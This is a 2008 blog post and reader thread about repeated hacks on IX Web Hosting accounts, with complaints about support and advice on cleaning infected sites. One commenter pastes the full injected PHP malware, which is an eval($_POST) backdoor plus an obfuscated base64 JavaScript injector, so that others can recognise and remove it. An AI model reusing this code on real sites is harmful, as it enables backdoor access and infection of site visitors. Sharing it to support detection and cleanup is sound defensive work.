IX Web Hosting – Terrible Customer Service? – Part 2

If you haven't read part 1 of this post, use the link below.

IX Web Hosting - Worst Host Ever? - Part 1

After my first run in with IX Web Hosting, I wrote the whole incident off as a fluke. The manager I spoke to seemed very sincere and assured me that wasn't proper protocol and wouldn't happen again. I was trucking right along until I got this email from them on October 26, 2008.

Dear Brent Crouch,

We have received notification of phishing material in your account. Phishing files are usually placed through some type of exploit of out dated code, weak file and folder permissions. Packaged shopping carts and photo galleries are usual sources as hackers find exploits and developers fix them almost daily, so unless you constantly update the software or completely secure it things like this can happen.

You must agree to remove this content and update any software that has resulted in security holes. To protect your account from further action you must agree to our request for compliance. Please respond to this message stating your intent to do so. You may either log into your control panel with us, and access this ticket via the 24/7 help desk, or provide this ticket number to our Live Chat or phone representatives. Failure to respond to this message within 72 hours will result in the suspension of the affected domain with us until such a time as this matter is resolved.

Michael

The email gave me no indication of which domain had been hacked. When I wrote to live help and gave them the ticket number, I spent 10 minutes waiting only to be told they didn't know which of my domains had been effected. They recommended I reply to the online support ticket. Here is the email I sent them in response on October 27, 2008.

I replied to live help and they could not find any information. So far you haven't told me which domain is a problem.

Please give me the info I need to correct this problem and I'll take care of it.

Brent Crouch
615-389-XXXX

Eight hours later, I was able to find the problem by viewing all the files on my domains and looking for the files that had been recently changed. It turned out my brentcrouch.com domain had been hacked and setup with all sorts of eBay and bank phising pages. The site operates on a WordPress platform which is widely used and is a big target for hackers. Aaron Wall provides some good info on how to secure your WordPress installation from being hacked.

I wrote back to IX Web Hosting for a second time on October 27, 2008.

I found the problem on my brentcrouch.com domain. I updated the wordpress software to the latest and cleaned up the problem.

The only exception is the brentcrouch.com/forum directory. I am unable to delete this directory as the hacker has removed my access. Please delete the directory.

Thanks,

Brent Crouch

The following day, here is the email I got back from IX Web Hosting.

Brent:

Thank you for your attention to this matter. Per your request we have removed:

/brentcrouch.com/forum - deleted

We will be closing this ticket at this time. If you have any questions please feel free to contact us. We will be happy to assist.

Please note that this is the second time this problem occurred. Unfortunately, I have to bring to your attention that as per our terms of service a third instance will result in immediate account termination without notice. No backups will be provided. If you have any questions about how to avoid this from happening again our support team will be glad to advise.

Respectfully
Frankie
Support Tech Representative

When I seen that response, I was pissed! I run my own server at Servint.net. I've hosting accounts at several other hosting companies. I've never had a site hacked except from IX Web Hosting.

In 4 months, I've had two sites hacked. In both instances, IX Hosting was zero help in locating the source of the problem. In the first incident, they didn't even reply to my ticket for 4 days. In the latest incident, they couldn't even tell me what domain was hacked.

Then they send me an email telling me if it happens again not only will they suspend my account, they'll deny me access to my files! Huh?

That's not a risk I'm willing to take. With the high costs of obtaining customer's in this business, I'm a little surprised they don't do a better job of trying to retain them. In my opinion, this policy is unacceptable and makes IX Web Hosting one of the worst hosts I've ever dealt with.

I just signed up for a hosting account with Host Gator and have already moved all my domains over. So far, so good.

What's your experience with IX Web Hosting?


 

If you enjoyed this post, make sure you subscribe to my RSS feed!

 

 

Tags: , , ,

57 Responses to “IX Web Hosting – Terrible Customer Service? – Part 2”


  1. Paul Says:

    Found this site because of a problem I am having with IXweb.
    I have 4 Buisness Accounts (about 35 sites)
    In May, I had the exact same problem, a “Wells Fargo” Phising site was added to my site folder, .. I asked how it was added, and of course it was my fault, permissions, ftp virus.. bla bla bla..
    During July, Aug, and September, 2 of my buisness accounts, ( 18 sites) along with 1000’s of others (ALL IXweb) were mass injected, base64 code injected into EVERY file, and permissions set to “server” (httpd) this happened EVERY 10 days for 3 months!!.. 1000’s of sites were affected.
    5 weeks went by, and today, ALL my sites were again injected, this time with a .htaccess file redirecting the sites to porn sites.
    The support at IXweb is USELESS, they know only what they have written in front of them, and even that, they get wrong!!..
    I now have a daunting task of moving about 35 sites to another host.
    Anyone serious about their web site, shoud not touch IXweb with a barge pole.


  2. Brent Crouch Says:

    @ Paul – I also had the same Wells Fargo site added to my server. I’m beginning to wonder about the security that IX Web Hosting has in place. They aren’t running a standard WHM / cpanel. The vulnerability could be with their system.

    I usually take care of my own sites, but when things get ugly I’ve got a guy that I use. If you need some help, just email me at brent at brentcrouch.com and I’ll get you contact info.

    Also be aware of this new cloaking / hacking method posted by Aaron Wall.
    http://www.seobook.com/wordpress-blog-hacking-checklist

    Good Luck,

    Brent


  3. Paul Says:

    I have personally spoken to the Manager of IX web, and they have openly addmitted ( in writing as well) that the issue WAS on their end, the July thru Sept. fiasco turned out to be a “Php Module” in the Linux server that allowed the worm to inject.
    The latest .htaccess injection is being looked into, and has nothing to do with the July / Sept. attack.
    The problem with IX is the support, they are ( or at least the majority) completely USELESS, and every problem that occurs, is the fault of the customer..
    I had 100% static html sites with ZERO subfolders injected, and they still blamed me for permission problems (777) when I told them I did not have any folders, they turn to ” Ftp Virus” !!!..
    Only after months of phone calls, and threats, do they finally admit the problem is on their end.
    For anyone interested, here is a link to a topic that was about the attack

    forum.joomla.org/viewtopic.php?f=431&t=311270&st=0&sk=t&sd=a&hilit=IXweb


  4. Brent Crouch Says:

    Great information Paul. I appreciate you sharing.

    I’d really like to bring this to more people’s attention. If you get a chance maybe you can stop by the forum below and leave your comments. It gets a lot of traffic and views and most everyone there wanted to blame me for my site getting hacked.

    http://www.webhostingtalk.com/showthread.php?t=734383


  5. Guy Says:

    I’m fighting with them right now. I also have a commercial account.

    I’ve hosted with IX for years. Usually their tech support is great, but since the data center move, I’d swear their techs were all the former sales people. They declare their servers have never been hacked. I’m struggling right now because all 24 of my domains were compromised. Some have no DNS entry, and had just the IX parking page for the domain — yup, those were hacked too! I had an 11-character complex password, and I only managed my domains using a boot-from-CD VM with no hard drive on the physical box, so there’s no possibility of having malware or viruses when working on domains or when I’m banking. The accounts were hacked and the files all said they were created by root:root, when it should have been me:me. If I had root, I’d be a happy gent.

    So, in my opinion, stay away from IX. They used to be great, but I’m switching to a colo-server so I can take care of my domains and my machines. I also have had the “implied threat” of losing all of my content.

    Nicel commentary, and good to virtually meet you, Brent.


  6. Mike Says:

    I had a number of IX Web Hosting accounts compromised on 13 November. The are claiming it is not them: the fact that multiple customers are having problems must just be one big coincidence.

    Blog entry discussing attack at:
    http://blog.riskythinking.com/2008/11/my-website-got-hacked.html


  7. Guy Says:

    I put a post on WebHostingTalk, answering your (rhetorical) question.

    I did ask them to restore my entire home directory with all files. They keep asking inane questions, such as which folder is my home folder (duh!). I’m waiting for their “oops, no backups” message. Complete TOS fail, in my opinion.

    Getting the email structures set up on the new VPS, and then I’ll be switching. Good thing I have 2 weeks left on this month’s subscription. I’m just waiting to see if they pull an AOL and keep billing my credit card after I leave.


  8. Beautiful Girl Says:

    I tried to use servage.net hosting – it is worst hosting company ever.


  9. Paul Says:

    Hi M8, could you give me more info about Servint.net and using VPS or dedi servers.
    I know nothing about them, and would like to run about 30 sites.. is that possible ?
    Any info / experience is appreciated.
    Regards
    Paul


  10. Brent Crouch Says:

    @Everyone – I had some problems when I moved my site from IX Webhosting to Host Gator. Even though my core WordPress files were moved to the new server, my config file was still pointing to the Mysql database I had at IX Webhosting.

    I didn’t even realize this happened until yesterday when IX closed my account. When that happened, the database no longer existed and my blog went down.

    I just realized what happened and restored the database with my latest backup. Unfortunately, that backup was missing a few of your comments. I believe I have restored most of them from the email moderation emails WordPress sends out when a comment is left.

    I apologize for the inconvenience.


  11. Brent Crouch Says:

    @Paul –

    Hi Paul,

    Servint.net offers a VPS for for only $49 a month. With a VPS, you can setup all your clients an individual account with their own cpanel. You as the administrator will be able to access and manage all the accounts from one cpanel known as WHM.

    You’ll be able to add as many accounts to your VPS as space allows. I think you’ll be very pleased with their service. You should at least give them a call.

    I’ve always had shared hosting accounts like IX and was a little intimidated at setting up my own VPS. I was basically forced to when I had a site getting over 100,000 visitors a month. It turned out to be very easy to do and the guys at Servint.net were their to help with any questions I had.

    If you decide to go this route, I’d be happy to give you a hand at no charge. It’s been over a year since I set my last VPS up and I’d like to have the practice of doing it again. If I can be of help to you, just let me know and we can setup a plan to configure the VPS and migrate your accounts.


  12. Guy Says:

    I have a VPS at Inmotion. Any details I should keep an eye out for when working on my system? Still trying to back up my IX account. I now have access issues via FTP. By the by, every single restored folder was hit at exactly 06:53 with the injector plus the bogus htaccess plus the fake php pages — three server root hacks still running strong. I created a new folder, put in a fake HTML page, and at 10:35 it was hit with all three. You’d think they would have their servers de-rooted by now. I’m wondering if it isn’t an inside job.


  13. Brent Crouch Says:

    @Guy – I don’t believe it was an inside job. I just believe IX still doesn’t know what the problem is. My opinion is the story about the outdated php files is bogus. If that were the case, all the servers should be updated by now and the attacks should be over.

    I can’t think of anything to watch out for on your VPS. If you run into any trouble drop me an email and I’ll try to help.


  14. Paul Says:

    Thank you Brent for the very kind offer, I might take you up on it one day, but at the moment I am slowly moving my sites away from IX to another host.. hopefully things will be a hell of a lot better than IX, one thing is certain, it can never be worse..


  15. Paul Says:

    Today I filed a complaint with the BBB ( Better Business Bureaus )

    I stronly advise everyone suffering from the IX web hosting incompetence, lies and deceit to file an official complaint, and try and get some kind of compensation for your grief.

    You can file a complaint at

    https://odr.bbb.org/odrweb/public/GetStarted.aspx

    Let’s hope IX webhosting can finally get there act together, and start respecting their honest customers.


  16. Paul Says:

    And another happy IX web customer shares her ordeal
    http://ixwebhostwarning.wordpress.com/


  17. Duf Says:

    Same deal here. I’ve had phishing files placed on my hosting, my phpbb3 board injected with malicious java code, and all of my files set to read only as well as having code injected into the end of EVERY SINGLE html and php file.

    Each and every time their worthless Ukraiane based help desk pointed the finger squarely at me, insisiting I had a password stealing trojan on my machine. That is what the paper they read off of tells them to do.

    They were totally unwilling to accept any responsibilites for the hacks. They suck, plain and simple.


  18. Rene Madsen Says:

    We have had the same experience with IXwebhosting – several of our sites have been introduced hacker code. On 20.12.2008, there was added encoding deployed on all sides.

    IXwebhostings support department believes that it is open script is guilty of hacking and 777 permisions, which we can refuse. They’ve created a user who comes from the root or other administrative use as places of encoding files, etc. Watch your file is not addressed then check all files for this code.

    Dear René,
    We are extremely sorry for the trouble you have faced.
    Please, note that most of hackers’ attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

    The attack that happened to your sites could be made via an FTP access to your account. Unfortunately, we don’t suggest secure FTP connection, for the reason of shared hosting. Please, could you change the FTP passwords under FTP MANAGER icon -> opposite to password field click on Edit. Please, take all of the appropriate measures to prevent other people access your FTP account and use your FTP login information.
    Please note that your files are located on the Linux-based server and you are able to change file/folder permissions so make sure you do not have any “open” files/folders with write permissions set for all.
    So please check if any folders has full granted permissions 777 set, which is means that it’s worldwriteable for anyone from the Web. Recommended permissions are 755 or 644.

    Should you have any further questions, feel free to contact us at anytime, we are available 24/7.
    With regards, Lesya Geychenko.
    Ecommerce corp. CR Dept.

    Our company work every day with Linux servers – and all permissions are correct.

    If your site has been hacked – Remove this php-coding in your files.:

    <?php if(!function_exists(’tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST[‘tmp_lkojfghx3′]))eval($_POST[‘tmp_lkojfghx3′]);if(!defined(’TMP_XHGFJOKL’))define(’TMP_XHGFJOKL’,base64_decode(’PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCchLyUyRiYlM0N+ZH5pdiYlMjAkJTczJCU3NH4lNzklNkNlPWRgJTY5QHMmJTcwJCU2QyU2MSQlNzklM0ElNkUlNkYlNkUlNjUlM0VcbiZkb2N1JTZEJmUkJTZFfHQuI3dyIyU2OXRlKCElMjIlM0MvJTc0JTY1JTc4fHRhfnImZWElM0UhIiUyOUAlM0IjJTc2YSU3MiMlMjAlNjklMkNAJTVGISxhJTNEfCU1Qn4iJCUzNyQlMzglMkUhJTMxMSQlMzBgLiUzMWA3fDUmLjIxfCIjJTJDJTIyJjE5JTM1LiUzMiUzNHwuQCUzNyE2JiUyRWAlMzImNSUzMX4iXSUzQl8lM0QlMzElM0JpJCU2NiUyOH4lNjRvJCU2MyU3NSYlNkQlNjVudCMlMkVAYyU2Rn5vayU2OX4lNjUubSU2MSElNzQlNjNoKEAvJCU1Q2BiJmgmJTY3QCU2NiU3NCYlM0R8MX4vISkhPT0lNkUkJTc1fCU2QyZsKWYmJTZGQHImKCU2OXwlM0QwO2lgJTNDJTMyITtpKyYlMkIlMjlkJTZGY351JTZEfiU2NX4lNkV0IS4jd2AlNzIlNjkjJTc0JmUlMjglMjIlM0NgJTczYyNyfGklNzAlNzQlM0VpfiU2NihffilkJTZGY3VtYGUjJTZFfnQlMkV3JCU3MiFpdH4lNjUofiU1QyMlMjIlM0MlNzMlNjMhciU2OSU3MHQlMjAmaWRgPSQlNUYlMjJAJTJCaSMlMkIlMjJAJTVGfCUyMCU3M2AlNzJjPUAvLyIrI2EhWyQlNjkhXSQlMkJAInwlMkZjJTcwYCUyRiQlM0ZAJTIyIyUyQnwlNkVhfCU3NiU2OWAlNjd8YSU3NCU2RmAlNzIlMkUlNjElNzAjcCU0RWElNkR8ZXwlMkVjJTY4JCU2MSU3MiU0MSU3NH4oJTMwJTI5JitAJTIyJTNFJTNDJTVDJTVDJTJGfnN8Y3ImJTY5JTcwdGAlM0VgJTVDfCJ8JTI5JTNDJTVDYC9+JTczJTYzYCU3MkAlNjklNzBgdCUzRSIlMjkkJTNCJFxuJTJGJi8jJTNDJi9AJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cJHwjfFwhfH58XCZ8QHxcfHxgL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo=’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));if(preg_match_all(’#5){$e=preg_match(’#[\’\”][^\s\’\”\.,;\?!\[\]:/\(\)]{30,}#’,$v)||preg_match(’#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(’IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,’</body’))$s=preg_replace(’#(\s*</body)#mi’,str_replace(’\$’,’\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(’PMT_knghjg’)||stristr($s,’=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i

    Best regards

    René Madsen
    Søgemaskineoptimering og seo


  19. Brent Crouch Says:

    Hi Rene,

    Thanks for dropping by and leaving your comment. It’s too bad IX is still not being truthful about what is going on.

    I’d highly recommend using Servint.net It is one of the best hosting companies I’ve ever dealt with.


  20. Larry Sypher Says:

    I just had my second total website outage with IX in the last 3 months. The first time back in October was the index page Trojan that THEY had on their server and the embedded scripts on all my pages. I restored my own site with backups because of the same rhetoric from them that they no longer had the backups. On Dec. 24th, apparently someone other than me accessed my FTP account (the one with a 25 character random generated HARD password) and my entire site including my OSCommerce store and SQL database was deleted. And again, here’s the response from the Ukrane:

    Alex G., Wed Dec 31 04:38:09 2008
    Ticket Status was changed from On-Hold to Resolved (NOT REALLY)

    Dear Larry Sypher,
    I am very sorry for this recent inconvenience, please accept my sincere apologies. Our admins have verified that all relevant backups have been rotated already. Unfortunately all backups which are older than a week are being deleted from the server on a regular basis because we cannot afford to store too old backups due to the many system restrictions of the shared hosting environment. It is much recommended to create local backup copies. I regret.
    Best regards,
    Technical Agent, CR
    CR Department
    Ecommerce.com
    Alex Golovko

    There is one PHP file still on my site that was hidden in Modlogan that directs one to spyhackerz.com. From what I’ve read everywhere, I’m convinced that their server vulnerability is tied to a PHP email reply page, at least in my case. Right before I went down, a got a couple “enquiry addressed” emails from that PHP email address utilized to that email address suggesting I go to some hot porn sites (*with some java code mixed in with the email text). I’m ready to move elsewhere instead of wasting my time rebuilding my whole site there only to loose it a third time again. The problem is that a VPS (Servint.net) is more than I need at this time. Some Happy New Year to me!!! Thanks for letting me vent. Good luck to everyone else too…


  21. Nightrider Says:

    On November 25, IX moved our entire site, without warning, to a new server. Before November 25, we had few problems after they worked out the Data Center move issues. The November 25 server move broke all of our sites and it took over 60 hours to get IX to fix most of them. Unfortunately, on November 26, our sites were all Hacked. IX did the typical thing of trying to blame permissions and outdated code for the hack, but our sites were all down on November 26. If we couldn’t access our code on November 26, neither could a hacker. IX’s excuses and attempt to blame are transparently clear. IX technicians even admitted to me that their security software only scans incoming email and that their “security” software is Open Source and not highly rated…

    After fighting with IX for over 60+ hours to fix the problems that they created in the unnecessary server move, the hacker continued attacking our site every day for about 3-4 weeks. I was deleting their files about as quickly as they could upload them, so eventually the hacker gave up on our site. But IX never admitted the problem was on their end even though the hacking began on a day when our sites were not available to anyone else…

    Then on January 10, IX decided to update all of the cgi-bin files on the domain and all subdomains, which broke everything again. This time, it took IX over 3 weeks to fix most of the problems that they created. I say most because some of the January 10 problems IX created still haven’t been fixed. They continued to try to blame our code. Our code has not changed since long before November 25, but IX has the nerve to blame our code for our sites being offline. How stupid do they think we are???

    I have spent countless hours fighting the problems that IX continues creating for us. It really pisses me off that they continue to try to blame us for all the problems that they have created. I really have enough to do than to have my host creating more work for me…

    I also offer tech support and several of the other IX sites that I assist also have recurring hacking problems. I haven’t seen this level of hacking with any other sites hosted with alternative Hosts. From the hundreds of sites that I support, it seems as though it is mostly the IX hosted sites that are being hacked right now…


  22. Brent Crouch Says:

    @Nightrider – You’ve got more patience than I do. I was feed up the second time I was hacked and they threatened to turn my account off. I’ll never use IX Webhosting again.


  23. Nightrider Says:

    I’ve been an IX customer for many years and for most of that time, it was a good host. Things really changed after the Data Center move though. We fought the Data Center move problems for several months before they were finally ironed out. Then all was fine until the unnecessary server move on November 25…

    I am in the process of looking for a different host, but finding a good one is like playing Russian Roulette. I tried Host Monster (Bluehost) but canceled that account after a day. I really like the HM Tech staff, but I really didn’t like the FTP and phpMyAdmin restrictions. If there was a way to combine the HM Tech Staff with the IX Servers, I think that would be close to the perfect host…

    I have steered a lot of people to IX over the years, now many of those people are fighting with IX over many of the same problems listed above. Several of the people I have referred to IX have already moved to alternative hosts. I feel bad about what they are going through since it was my recommendation that led them to IX in the first place. IX has changed significantly from when I first started using its services. I don’t see any evidence that it is fighting to return to the same quality service that it offered when I first signed up with it…

    My patience has warn out. It grates on my nerves each time IX tech staff thanks me for my patience in my numerous trouble tickets. That cart left the stall a long time ago. I have no confidence in the IX Tech staff any longer. NONE…


  24. Erik Says:

    IX is currently experiencing extended down time, at least for the 12+ domains I’m hosting with them. It started some time before Saturday 2/7, was out most of the day, then by Sunday afternoon the sites were down again. Since Sunday, all of my domains are empty (as seen via FTP). Their support people are useless and can only say they are working on the issue. 2+ days of downtime is totally unacceptable. Time to research other ISPs.


  25. karen Says:

    Well, I’ve just been hacked!!! by someone called spyhackerz.com. this is the same name Larry above mentioned. I know little about websites. I made mine using frontpage not using any ftp, nothing fancy and I find I’ve been hacked. I’ve written them and am awaiting a reply.
    BTW I’ve also had problems uploading files (I have a lot of photos on my site) and kept on getting error message about frontpage extensions not being compatible or some such nonsense.


  26. Brent Crouch Says:

    Karen – Sorry to hear you were hacked. I don’t see any end in sight for IX Web Hosting. If I worked there, I’d be looking for another job. I don’t think they can last much longer if they can’t handle these issues.


  27. Nightrider Says:

    I offer technical support to hundreds of websites. The only ones being hacked right now are IX hosted sites. IX continues to blame everyone but won’t accept responsibility for anything on their end. It is clear to me that the problem is with IX security. To make it seem as though they are actually doing something, they reset all the FTP passwords for all their clients. IOW, they are still trying to blame their clients for their security problems…

    The hacking could be an inside job or it could be someone has gained full adminstrative permissions to the IX servers. Until IX understands and corrects the problems on their end, I expect that almost all IX clients will continue to be at risk from further attacks and I suspect that IX will continue to try to pass the blame and refuse to accept responsibility…

    I submitted a complaint a couple of days ago against IX Webhosting with the BBB (Better Business Bureau). The more people who complain, the more likely that the BBB will take action and force IX to change…


  28. karen Says:

    Well I wrote a ticket to them. No answer. But now says my website is under construction. Sent another 30 min ago. Just checked in the control panel and it says “(Dedicated IP)CHANGE to Shared IP
    Please note that due to DNS propagation your website will become unavailable for up to 48 hours if you switch from a dedicated to a shared IP address or vice versa.”
    Do you know what this means?
    Thanks
    Karen
    PS: I am thinking of changing companies…


  29. Brent Crouch Says:

    @Karen – I wouldn’t just think about changing companies, I’d be out of there today. From the error you are getting, it sounds like they need to restart their DNS server.


  30. Brent Crouch Says:

    @Nightrider – I agree that filing a complaint with the BBB is a good idea. There are a lot of people posting on forums, but the BBB is a good place to consolidate everything and see just how many complaints there are.


  31. Nightrider Says:

    @Karen – if you need help getting your site back online, I would be happy to help you. Since I have been cleaning up a lot of hacked IX sites lately, it is getting easier for me to figure out where the infections are and be able to remove them…

    @Brent – The BBB generally won’t act on a complaint unless there are many similar complaints against the same company. So if we can get all those who are fighting problems with IX Webhosting to report them to the BBB, then there would be a better chance that something will be done. Otherwise, one or two complaints to the BBB really don’t get much attention. I see a lot of complaints in IX Webhosting reviews all over the Internet, but I doubt that they have much impact other than hopefully preventing people from making the mistake of buying IX hosting services. IX is probably so big at this time that they really don’t notice a few less sales here and there. But if people are complaining in mass to the BBB, that might actually be productive…


  32. Erik Says:

    It looks like IX has a few entries with the BBB, one of which is accredited and has an “A” rating. They have received complaints, though, many of which are service-related.

    Go here: http://search.bbb.org
    and search for “IX Web” and that will bring up the three records

    So which one to file a complaint against?


  33. Nightrider Says:

    I filed against the following:

    IX Web Hosting
    247 Mitch Lane
    Hopkinsville, KY 42240


  34. Norm Says:

    Using Firefox, recently my site has been flagged by Firefox/Google as a “possible Attack Site.” I don’t know who made them the Internet Police. They accuse you and you’re screwed. I contacted IX. They directed me to some free malware detector program which I downloaded and used. It allegedly found 20 items of malware on my compter. I still have no way of knowing what’s wrong on my site. I have looked closely at the code for the pages they flag, and there’s simply nothing there that is sinister. IX was helpful, but not much help. I don’t know if this is related to the problems you all had. But my 2 years with IX is up in May and I will probably change to another webhoster. If there is sinister code on my site, there should be some program to find it. I can’t go through 500 webpages, line by line, looking for I don’t know what. I just don’t have the expertise to solve this problem. One solution so far has been to stop using Firefox and go back home to MSIE. MSIE does NOT show my site as an “Attack Site.” Curious. And there seems to be no real way to contact Google or Firefox about this. They accuse you and you are guilty until you somehow clear yourself. -Norm.


  35. Brent Crouch Says:

    Norm,

    I’m sorry to hear that news. Interestingly enough, I was visiting auctiva.com over the weekend and I got the same message. My main concern was how to clear you site once it has been labeled as an “attack site.” When you finally figure out the solution to this problem, please let us all know. I think it can be useful info.


  36. Nightrider Says:

    Norm,

    If Google has flagged your site, it most likely has been hacked. Things to look for are newly modified files. Use your FTP application to look for files with recent modified date time stamps. Look for .htaccess files that you did not place in your folders. Look for files that don’t belong. If you access a database, check out your config and other important tables for added code. These are the most common ways that hackers infect your site….

    If your files have added code, you can use programs like UltraEdit to find and replace the extra code even if the hacking code covers multiple lines. I have seen sites where thousands of files have been modified. Using UltraEdit, I can clean all the files at once in a matter of seconds. The part that takes the longest is downloading and uploading the files from/to your server…

    If you do decide to switch hosts, you really want to clean up your site before moving your files elsewhere. Otherwise, you take the problem to the next host…


  37. karen Says:

    To Nightrider: I don’t know how you can do it but if you want to help that would fine. My current problem is that I did the site in FrontPage and I don’t have a copy of it my newish computer.
    I just thought I’d also copy the last response from ix
    BTW: I’ve scanned everything with AVG and nothing showed up
    “Dear ,

    Please note that most of hackers’ attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

    So I recommend you to scan all your files for viruses at your local computer. In the case it won’t help please restore your files from your local backup or if you have no such please create a ticket and we’ll restore your files from our system backup.

    Also please note that your files are located on the Linux-based server and you are able to change file/folder permissions so make sure you do not have any “open” files/folders with write permissions set for all.
    So please check if any folders has full granted permissions 777 set, which is means that it’s worldwriteable for anyone from the Web. Recommended permissions are 755.
    I also recommend you to change your current FTP password through the Control Panel (Manage -> FTP manager -> Password icon). Some widespread trojans have a functions to steal FTP passwords from user`s local PC`s and send these passwords to hackers (or special bots which were made by hackers). So you need to scan your local PC for viruses (using in-depth scanning) and change your current FTP password.

    Should you have any further questions, feel free to contact us 24/7.

    Kind regards,
    Vlad Derevyanko
    Technical Support


  38. karen Says:

    Part 2: Does anyone have recommendations for webhosting services? I was checking out Blue Host but they seem to have completely mixed reviews from great to “they closed down my site with little warning”
    And finally what about using Joomla and/or Ruby on Rails? Does anyone have experience creating a website using it? thanks much


  39. karen Says:

    Decided to try Host Gator. They said they could import my site. also looks like they have sitebuilder which looks like it might be helpful for redoing my site in the near future. Still curious about Ruby on Rails and Joomla


  40. Brent Crouch Says:

    @Karen – You should be fine with Host Gator. Most people are happy with them. I use them to host this blog as well as some other affiliate sites I have. If you have any problems or questions I can help you with, let me know.


  41. Brent Crouch Says:

    @Nightrider – I had someone write me today and tell me they had a “malicious site” warning when visiting my ecommerce site jillianleather.com. I can’t get the message and when I search for my site in Google it shows up in the index with no warnings attached.

    At one time, I linked to a free ftp program from this blog. A few months later, the site I was linking to was hacked and Google flagged my site as a “potentially dangerous” site for linking to it. It took me months to get the warning removed.

    Is there any quick fix to removing that warning? Someone told me it is based on IP address. If that is the case, I guess you could clean up the infection and switch ips. Any ideas?


  42. Nightrider Says:

    @karen – What you have is the standard message that IX gives every time someone complains that their site has been hacked. It is 100% blame of the client without any effort in looking into the problem. Although I believe that most of the hacking attempts that I’ve seen on IX sites are exploits of security holes on the IX servers, what IX suggests does make sense in general terms…

    It is good to make sure that most of your folder permissions are set to 755. 777 is a very dangerous setting, so this permission should ONLY be reserved for folders where you allow people to upload files to your server. Any folder that must be set to 777 should be monitored closely on a regular basis since you are allowing the entire world to upload content to the folder, including content that can be used to access the rest of your site and database if you have one. File permissions should only be set to 644 on most servers. Some servers require that all file permissions be set to 755 though, so that setting is dependent on what is required by your host. On IX servers, your file permissions should be set to 644. Generally the best way to test to see what your host allows is simply to upload a file to the server. The server will automatically set it to the correct default permission. Files that need to be modified by utilities on your site need to be set to 666, which is extremely rare, but all other files should be set to 644 for most sites. The most dangerous permissions are 666 and 777, so they should not be used unless absolutely necessary…

    It is also good to keep your content up to date. For example, early versions of phpBB had serious security flaws, so those sites that did not update were at great risk of being exploited, and many were. The latter versions of phpBB2 were safe though, so upgrading to phpBB3 could not be considered an improvement in security. The general rule of thumb is that if a program is being upgraded, then you should try to keep up with the updates. If a program is completely rewritten from scratch, as was phpBB3, then chances are the earlier version (phpBB2) might be as secure, if not more so, than the newer version (phpBB3). Software like phpBB3 may take several updates before the newly introduced security flaws are exposed and corrected. So as you can see in this example, it is often good to keep up with the latest version, but that is not always the case…

    If you have been told that your site has been hacked or you know it is, then you need to try to pinpoint how it was done. Look for new modified date time stamps on your files. If your files have been modified, a great many could have the same code added to them. The modified date time stamp should reveal all files that were modified. Generally, the most targeted files are any files with the word index in the name, but that is not always the case. Sometimes, all php files are targeted, other times it may be all HTML files that are targeted. Typically when a hacker adds code to the file, you can find the added code toward the bottom of the file(s). In php files, you will usually find the infection just before the ?> code at the bottom. The added code could include the words Yahoo Counter or iframe. Often times the code looks like a bunch of jiberish. Even though it looks like jiberish, browsers can usually interpret and execute the code. If the hacker added code to your files, usually the same code is added to all the modified files, so you can use powerful text editors like UltraEdit to remove it from all your files all at once instead of manually removing the code from each file separately yourself…

    If you don’t find any files with new modified date time stamps, then chances are your files have not been modified and the hacker has found another way to infect your site. It is possible that the hacker uploaded files to your server. They often try to hide their files in obscure locations. They often upload a .htaccess file to the root of your main folder. If you download and open the .htaccess file in your favorite text editor, it will usually point to the location of the other uploaded content. Often times, you might find files named something like 423402342.php, but sometimes the files have normal sounding names. It is good to know what belongs on your server so that when you see a file uploaded by a hacker, you will immediately recognize that it doesn’t belong the second you discover it. All files that you don’t recognize should be copied to your PC before you delete them, just in case you make a mistake and the files actually do belong. If you mistakenly delete one of your valid files, if you make backups before you delete them, you can quickly re-upload them to fix anything you might have accidentally broken…

    If you cannot find files with new modified date time stamps and you cannot find any uploaded files that do not belong, then if you use a database, then code may have been added to your most important tables. The trick is to determine which pages are hacked and which tables are used to populate those pages. On more than one occasion, I have found the phpbb_config and phpbb_categories tables infected on phpBB forums. When the phpbb_config table was hacked, the added code was in the Site name field. Since every page in phpBB uses the Site name from the config table, this meant that all phpBB pages were infected. When the phpbb_categories table was infected, it only infected the main Index page since that was the only time the phpbb_categories table was accessed. Other important tables could be infected too…

    I used phpBB in my examples above, but the same rules apply for almost every utility and program that you might be running on your site. Hackers tend to follow patterns, so once you discover their pattern, it makes it easy to figure out what they have done and where and how to clean it up. If you need more personal assistance, you are welcome to post a comment in my Area 51 forum or send me a PM in my community and I would be more than happy to assist you further if I can…

    I really hope this helps…


  43. Nightrider Says:

